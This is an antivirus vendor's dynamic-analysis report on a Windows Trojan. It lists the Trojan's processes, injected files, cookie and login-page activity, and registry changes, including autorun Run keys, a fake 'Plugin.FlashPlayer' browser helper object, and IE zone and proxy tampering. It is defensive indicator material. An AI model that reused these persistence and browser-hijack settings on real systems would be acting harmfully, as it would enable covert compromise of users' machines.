Gen.Variant.Graftor.153398_12cff1b8d8 – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

RegSvr32.exe:744
p.exe:2008
mscorsvw.exe:172
regsvr32.exe:1024
ie.exe:1472

The Trojan injects its code into the following process(es):

wilk.exe:1700
p.exe:1536
msv.exe:1820

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process wilk.exe:1700 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\gbclass.dll (7386 bytes)
%Program Files%\Internet Explorer\mswinsck.ocx (1312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ie.exe (353954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\a.dll (16222 bytes)

The process p.exe:2008 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Bactria.xs (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (2476 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp (0 bytes)

The process msv.exe:1820 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot (8346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (4462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\logo_2x[1].png (3393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\DXI1ORHCpsQm3Vp6mXoaTXZ2MAKAc2x4R1uOSeegc5U[1].eot (8343 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\avatar_2x[1].png (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\logo_strip_2x[1].png (4739 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[2].txt (712 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\universal_language_settings-21[1].png (199 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[1].txt (950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (5907 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[2].txt (0 bytes)

The process regsvr32.exe:1024 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\p.exe (2452 bytes)
%Documents and Settings%\%current user%\Application Data\wilk.exe (182 bytes)
%Documents and Settings%\%current user%\Application Data\nf.xpi (863 bytes)
%Documents and Settings%\%current user%\Application Data\msv.exe (29851 bytes)

The process ie.exe:1472 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (3574 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (141 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (472 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (1270 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (830 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support (16 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (1404 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (132160 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (9 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (1316 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (803 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (374 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (11 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (11 bytes)
%WinDir%\IE9_main.log (3233 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (121 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (1 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (0 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (0 bytes)

Registry activity

The process wilk.exe:1700 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"(Default)" = "%WinDir%\gbclass.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"IE.exe" = "UtilitÃƒÆ’Ã‚Â¡rio de InstalaÃƒÆ’Ã‚Â§ÃƒÆ’Ã‚Â£o do Windows Internet Explorer 9"

[HKCU\Software\VB and VBA Program Settings\ml\inst]
"inect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}" = "1"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 B7 DE EC 83 C8 17 D4 56 64 29 EB FA 20 79 C3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"0" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"internet" = "explorer C:\"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"

The process RegSvr32.exe:744 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 35 2C 29 3A 38 C2 B2 AC 7E 90 CA 94 90 C5 A9"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\TypeLib]
"(Default)" = "{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}"

[HKCR\Plugin.FlashPlayer\Clsid]
"(Default)" = "{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}]
"(Default)" = "_FlashPlayer"

[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0]
"(Default)" = "Plugin"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\VERSION]
"(Default)" = "1.0"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\TypeLib]
"(Default)" = "{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\ProgID]
"(Default)" = "Plugin.FlashPlayer"

[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\HELPDIR]
"(Default)" = "%WinDir%"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\0\win32]
"(Default)" = "%WinDir%\gbclass.dll"

[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"(Default)" = "%WinDir%\gbclass.dll"

[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Plugin.FlashPlayer]
"(Default)" = "Plugin.FlashPlayer"

The process p.exe:1536 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 3C FB B6 FF 15 BC 5D 07 C4 95 CE FD 36 A0 44"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\WinRAR]
"HWID" = "7B 38 44 41 46 37 39 38 37 2D 38 44 37 43 2D 34"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The process p.exe:2008 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 50 33 89 74 6F 6B 82 90 3D 48 12 57 B0 9D AA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process mscorsvw.exe:172 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"

The process msv.exe:1820 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 06 ED B6 6C 71 90 4E B4 E2 E4 23 34 E7 4B E1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msv.exe" = "%Documents and Settings%\%current user%\Application Data\msv.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:1024 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 24 6B 6C A0 25 8B 67 76 2B 63 0F 41 7B 8F 9E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"wilk.exe" = "WindowsApplication1"

"msv.exe" = "msv"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"p.exe" = "p"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

